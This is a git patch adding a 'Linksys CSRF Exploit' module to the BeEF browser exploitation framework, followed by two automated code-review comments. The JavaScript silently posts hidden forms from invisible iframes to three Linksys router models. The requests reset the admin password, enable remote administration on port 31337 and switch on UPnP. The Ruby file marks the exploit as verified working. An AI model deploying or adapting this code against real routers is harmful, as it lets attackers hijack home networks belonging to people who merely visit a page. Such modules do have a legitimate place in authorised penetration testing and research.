From d088fe6fb7c8c76527ed1719ea1aab5d65fd3360 Mon Sep 17 00:00:00 2001
From: "wade@bindshell.net"
Date: Mon, 20 Dec 2010 06:24:48 +0000
Subject: [PATCH] Linksys CSRF module summited by Martin Barbella committed. It contains 3 CSRF exploits.
git-svn-id: https://beef.googlecode.com/svn/trunk@622 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
.../network/linksys_csrf/linksys_csrf.js | 193 ++++++++++++++++++
.../network/linksys_csrf/linksys_csrf.rb | 38 ++++
2 files changed, 231 insertions(+)
create mode 100644 modules/commands/network/linksys_csrf/linksys_csrf.js
create mode 100644 modules/commands/network/linksys_csrf/linksys_csrf.rb
diff --git a/modules/commands/network/linksys_csrf/linksys_csrf.js b/modules/commands/network/linksys_csrf/linksys_csrf.js
new file mode 100644
index 000000000..78739e297
--- /dev/null
+++ b/modules/commands/network/linksys_csrf/linksys_csrf.js
@@ -0,0 +1,193 @@
+function pwn_wrt54g2() {
+ var port = '<%= @port %>';
+ var gateway = '<%= @base %>';
+ var passwd = '<%= @password %>';
+
+ var target = gateway + "Manage.tri";
+
+ var iframe = beef.dom.createInvisibleIframe();
+
+ var form = document.createElement('form');
+ form.setAttribute('action', target);
+ form.setAttribute('method', 'post');
+
+ var input = null;
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'MANAGE_USE_HTTP');
+ input.setAttribute('value', 0);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'MANAGE_HTTP');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'MANAGE_HTTP_S');
+ input.setAttribute('value', 0);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'MANAGE_PASSWORDMOD');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'MANAGE_PASSWORD');
+ input.setAttribute('value', passwd);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'MANAGE_PASSWORD_CONFIRM');
+ input.setAttribute('value', passwd);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', '_http_enable');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'MANAGE_WLFILTER');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'MANAGE_REMOTE');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'MANAGE_PORT');
+ input.setAttribute('value', port);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'MANAGE_UPNP');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'layout');
+ input.setAttribute('value', 'en');
+ form.appendChild(input);
+
+ iframe.contentWindow.document.body.appendChild(form);
+ form.submit();
+}
+
+function pwn_wrt54g() {
+ var port = '<%= @port %>';
+ var gateway = '<%= @base %>';
+ var passwd = '<%= @password %>';
+
+ var target = gateway + "manage.tri";
+
+ var iframe = beef.dom.createInvisibleIframe();
+
+ var form = document.createElement('form');
+ form.setAttribute('action', target);
+ form.setAttribute('method', 'post');
+
+ var input = null;
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'remote_mgt_https');
+ input.setAttribute('value', 0);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'http_enable');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'https_enable');
+ input.setAttribute('value', 0);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'PasswdModify');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'http_passwd');
+ input.setAttribute('value', passwd);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'http_passwdConfirm');
+ input.setAttribute('value', passwd);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', '_http_enable');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'web_wl_filter');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'remote_management');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'http_wanport');
+ input.setAttribute('value', port);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'upnp_enable');
+ input.setAttribute('value', 1);
+ form.appendChild(input);
+
+ input = document.createElement('input');
+ input.setAttribute('type', 'hidden');
+ input.setAttribute('name', 'layout');
+ input.setAttribute('value', 'en');
+ form.appendChild(input);
+
+ iframe.contentWindow.document.body.appendChild(form);
+ form.submit();
+}
+
+function pwn_befsr41() {
+ var iframe = beef.dom.createInvisibleIframe();
+ iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
+}
+
+beef.execute(function() {
+ pwn_wrt54g2();
+ pwn_wrt54g();
+ pwn_befsr41();
+ beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+});
diff --git a/modules/commands/network/linksys_csrf/linksys_csrf.rb b/modules/commands/network/linksys_csrf/linksys_csrf.rb
new file mode 100644
index 000000000..bf11a17ac
--- /dev/null
+++ b/modules/commands/network/linksys_csrf/linksys_csrf.rb
@@ -0,0 +1,38 @@
+module BeEF
+module Modules
+module Commands
+
+
+class Linksys_csrf < BeEF::Command
+
+ #
+ # Defines and set up the command module.
+ #
+ def initialize
+ super({
+ 'Name' => 'Linksys CSRF Exploit',
+ 'Description' => 'Attempts to enable remote administration and change the password on a linksys router.',
+ 'Category' => 'Network',
+ 'Author' => 'Martin Barbella',
+ 'Data' => [['name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'], ['name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'], ['name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__']],
+ 'File' => __FILE__
+ })
+
+ set_target({
+ 'verified_status' => VERIFIED_WORKING,
+ 'browser_name' => ALL
+ })
+
+ use_template!
+ end
+
+
+ def callback
+ save({'result' => @datastore['result']})
+ end
+
+end
+
+end
+end
+end
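Review bot: The `beef.net.sendback(..., "result=exploit attempted")` call inside `beef.execute` runs straight after `form.submit()` and the iframe `src` assignment, before any of the three requests has completed, and nothing in this file can observe their outcome because the iframes point at another origin; the value saved as `result` is therefore a constant rather than a status. A comment above that line should make this explicit, e.g. `// Cross-origin: responses cannot be read; 'result' only records that the requests were issued.`, so the stored result is not read as a success indicator. `pwn_wrt54g2` and `pwn_wrt54g` also repeat the same createElement/setAttribute/appendChild sequence for every field; an `addHiddenInput(form, name, value)` helper driven by a name-to-value object would reduce each function to its field table and make the two lists easier to compare against the device's form. Each `var x = '<%= ... %>'` line additionally drops an ERB value into a single-quoted JS literal unescaped, so an option value containing `'` yields a syntax error in the generated script rather than a clean failure.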
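Review bot: Each entry of `'Data'` is written as `['name' => 'base', ...]`, which Ruby parses as an Array containing one Hash, so the option list is `[[{...}], [{...}], [{...}]]` rather than a flat array of hashes; unless the command loader deliberately unwraps one-element arrays, the UI fields and the `@base`/`@port`/`@password` bindings the template relies on would not be populated. Writing each entry as `{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'}` (and likewise for `port` and `password`) gives the flat shape. The default `base` value also carries embedded basic-auth credentials, which the JS template concatenates straight into the form actions; that assumption deserves a mention in the `ui_label` or `Description` rather than living only in the default.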